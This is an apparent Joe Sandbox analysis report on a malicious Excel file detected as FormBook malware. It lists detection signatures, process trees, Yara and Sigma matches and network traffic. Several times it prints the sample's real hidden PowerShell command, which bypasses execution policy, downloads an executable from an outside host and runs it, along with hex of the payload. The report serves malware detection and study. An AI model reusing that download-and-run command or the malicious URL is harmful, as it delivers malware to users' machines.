Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 5901777.xls

Overview

General Information

Sample Name:5901777.xls
Analysis ID:323692
MD5:899e5af08f0794f0131adbf03f841045
SHA1:242508434986d472b0b83387ec8d5d33888baa29
SHA256:74b115a8b1f4e18d26b092dc965b60ad94dba931591d9913db219823d294904a
Tags:xls

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected FormBook
Bypasses PowerShell execution policy
Creates processes via WMI
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5988 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • splwow64.exe (PID: 3636 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
  • powershell.exe (PID: 5164 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • oftmhayq.exe (PID: 5540 cmdline: 'C:\Users\Public\oftmhayq.exe' MD5: 7E26E87AB642008D934824D509559859)
      • oftmhayq.exe (PID: 2344 cmdline: C:\Users\Public\oftmhayq.exe MD5: 7E26E87AB642008D934824D509559859)
  • powershell.exe (PID: 5184 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • oftmhayq.exe (PID: 4000 cmdline: 'C:\Users\Public\oftmhayq.exe' MD5: 7E26E87AB642008D934824D509559859)
      • oftmhayq.exe (PID: 3708 cmdline: C:\Users\Public\oftmhayq.exe MD5: 7E26E87AB642008D934824D509559859)
        • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • vlc.exe (PID: 3476 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe' MD5: 7E26E87AB642008D934824D509559859)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
5901777.xlsPowerShell_in_Word_DocDetects a powershell and bypass keyword in a Word documentFlorian Roth
  • 0x30b17:$s1: powershell.exe
  • 0x30b4b:$s2: Bypass

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      30.2.oftmhayq.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        30.2.oftmhayq.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        30.2.oftmhayq.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        29.2.oftmhayq.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          29.2.oftmhayq.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\oftmhayq.exe' , CommandLine: 'C:\Users\Public\oftmhayq.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\oftmhayq.exe, NewProcessName: C:\Users\Public\oftmhayq.exe, OriginalFileName: C:\Users\Public\oftmhayq.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5164, ProcessCommandLine: 'C:\Users\Public\oftmhayq.exe' , ProcessId: 5540
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\oftmhayq.exe' , CommandLine: 'C:\Users\Public\oftmhayq.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\oftmhayq.exe, NewProcessName: C:\Users\Public\oftmhayq.exe, OriginalFileName: C:\Users\Public\oftmhayq.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5164, ProcessCommandLine: 'C:\Users\Public\oftmhayq.exe' , ProcessId: 5540
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\oftmhayq.exe' , CommandLine: 'C:\Users\Public\oftmhayq.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\oftmhayq.exe, NewProcessName: C:\Users\Public\oftmhayq.exe, OriginalFileName: C:\Users\Public\oftmhayq.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5164, ProcessCommandLine: 'C:\Users\Public\oftmhayq.exe' , ProcessId: 5540

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\Public\oftmhayq.exeAvira: detection malicious, Label: HEUR/AGEN.1136389
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeAvira: detection malicious, Label: HEUR/AGEN.1136389
          Multi AV Scanner detection for domain / URLShow sources
          Source: sparepartiran.comVirustotal: Detection: 10%Perma Link
          Source: http://sparepartiran.comVirustotal: Detection: 10%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: 5901777.xlsVirustotal: Detection: 23%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\oftmhayq.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeJoe Sandbox ML: detected
          Source: 30.2.oftmhayq.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 29.2.oftmhayq.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: global trafficDNS query: name: sparepartiran.com
          Source: global trafficTCP traffic: 192.168.2.3:49743 -> 162.223.88.131:80
          Source: global trafficTCP traffic: 192.168.2.3:49743 -> 162.223.88.131:80
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Nov 2020 10:38:08 GMTServer: ApacheLast-Modified: Fri, 27 Nov 2020 09:07:10 GMTAccept-Ranges: bytesContent-Length: 552960Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b be c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 50 04 00 00 1e 04 00 00 00 00 00 4e 6f 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 6e 04 00 57 00 00 00 00 80 04 00 d8 1b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 4f 04 00 00 20 00 00 00 50 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 1b 04 00 00 80 04 00 00 1c 04 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 08 00 00 02 00 00 00 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 6f 04 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 4a 04 00 68 24 00 00 03 00 00 00 15 00 00 06 a0 30 00 00 ec 19 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 15 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 33 00 00 00 00 00 00 00 02 28 14 00 00 0a 02 1d 2d 13 26 02 19 2d 15 26 02 15 2d 17 26 02 28 05 00 00 06 2b 15 28 03 00 00 06 2b e7 28 04 00 00 06 2b e5 28 07 00 00 06 2b e3 2a 00 13 30 07 00 8a 00 00 00 01 00 00 11 20 d9 03 00 00 1c 2d 1b 26 73 15 00 00 0a 1a 2d 15 26 73 58 00 00 06 1b 2d 0f 26 06 6f 16 00 00 0a 2b 10 0d 2b e3 0a 2b e9 13 04 2b ee 17 28 17 00 00 0a 06 6f 18 00 00 0a 09 6a 32 f0 02 d0 2b 00 00 01 28 19 00 00 0a 72 01 00 00 70 17 8d 48 00 00 01 0b 07 16 d0 01 00 00 1b 28 19 00 00 0a a2 07 28 1a 00 00 0a 14 17 8d 2a 00 00 01 0c 08 16 11 04 6f 5b 00 00 06 a2 08 6f 1b 00 00 0a 74 2b 00 00 01 7d 01 00 00 04 2a 00 00 03 30 09 00 20 00 00 00 00 00 00 00 02 02 7b 01 00 00 04 72 0b 00 00 70 6f 1c 00 00 0a 1d 2d 04 26 26 2b 07 7d 02 00 00 04 2b 00 2a 13 30 09 00 75 00 00 00 02 00 00 11 02 7b 02 00 00 04 28 1d 00 00 0a 19 2d 0a 26
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Nov 2020 10:38:08 GMTServer: ApacheLast-Modified: Fri, 27 Nov 2020 09:07:10 GMTAccept-Ranges: bytesContent-Length: 552960Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b be c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 50 04 00 00 1e 04 00 00 00 00 00 4e 6f 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 6e 04 00 57 00 00 00 00 80 04 00 d8 1b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 4f 04 00 00 20 00 00 00 50 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 1b 04 00 00 80 04 00 00 1c 04 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 08 00 00 02 00 00 00 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 6f 04 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 4a 04 00 68 24 00 00 03 00 00 00 15 00 00 06 a0 30 00 00 ec 19 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 15 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 33 00 00 00 00 00 00 00 02 28 14 00 00 0a 02 1d 2d 13 26 02 19 2d 15 26 02 15 2d 17 26 02 28 05 00 00 06 2b 15 28 03 00 00 06 2b e7 28 04 00 00 06 2b e5 28 07 00 00 06 2b e3 2a 00 13 30 07 00 8a 00 00 00 01 00 00 11 20 d9 03 00 00 1c 2d 1b 26 73 15 00 00 0a 1a 2d 15 26 73 58 00 00 06 1b 2d 0f 26 06 6f 16 00 00 0a 2b 10 0d 2b e3 0a 2b e9 13 04 2b ee 17 28 17 00 00 0a 06 6f 18 00 00 0a 09 6a 32 f0 02 d0 2b 00 00 01 28 19 00 00 0a 72 01 00 00 70 17 8d 48 00 00 01 0b 07 16 d0 01 00 00 1b 28 19 00 00 0a a2 07 28 1a 00 00 0a 14 17 8d 2a 00 00 01 0c 08 16 11 04 6f 5b 00 00 06 a2 08 6f 1b 00 00 0a 74 2b 00 00 01 7d 01 00 00 04 2a 00 00 03 30 09 00 20 00 00 00 00 00 00 00 02 02 7b 01 00 00 04 72 0b 00 00 70 6f 1c 00 00 0a 1d 2d 04 26 26 2b 07 7d 02 00 00 04 2b 00 2a 13 30 09 00 75 00 00 00 02 00 00 11 02 7b 02 00 00 04 28 1d 00 00 0a 19 2d 0a 26
          Source: Joe Sandbox ViewIP Address: 162.223.88.131 162.223.88.131
          Source: Joe Sandbox ViewASN Name: COLOUPUS COLOUPUS
          Source: global trafficHTTP traffic detected: GET /js/2Q/5901777.pdf.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /js/2Q/5901777.pdf.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /js/2Q/5901777.pdf.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /js/2Q/5901777.pdf.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
          Source: unknownDNS traffic detected: queries for: sparepartiran.com
          Source: powershell.exe, 00000014.00000002.416291005.000001D20A361000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.443905156.000001F6E4B80000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512239339.0000000008A14000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: oftmhayq.exe, 00000019.00000003.423991911.00000000063AB000.00000004.00000001.sdmpString found in binary or memory: http://en.wikip
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000018.00000003.421069642.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: powershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000014.00000002.417757866.000001D20A471000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.425672375.000001F6CC491000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000014.00000002.434703367.000001D20B78E000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.c
          Source: powershell.exe, 00000014.00000002.434548786.000001D20B76E000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.431327100.000001F6CD016000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.com
          Source: powershell.exe, 00000015.00000002.433516174.000001F6CD269000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.com/js/2Q/5
          Source: powershell.exe, 00000015.00000002.437681363.000001F6CD8C3000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.com/js/2Q/5901777.pdf.exe
          Source: powershell.exe, 00000014.00000002.421247257.000001D20A682000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.com/js/2Q/5901777.pdf.exe0yRO
          Source: powershell.exe, 00000014.00000002.417383854.000001D20A3F4000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.com/js/2Q/5901777.pdf.exeers
          Source: powershell.exe, 00000014.00000002.434548786.000001D20B76E000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.comx
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html:
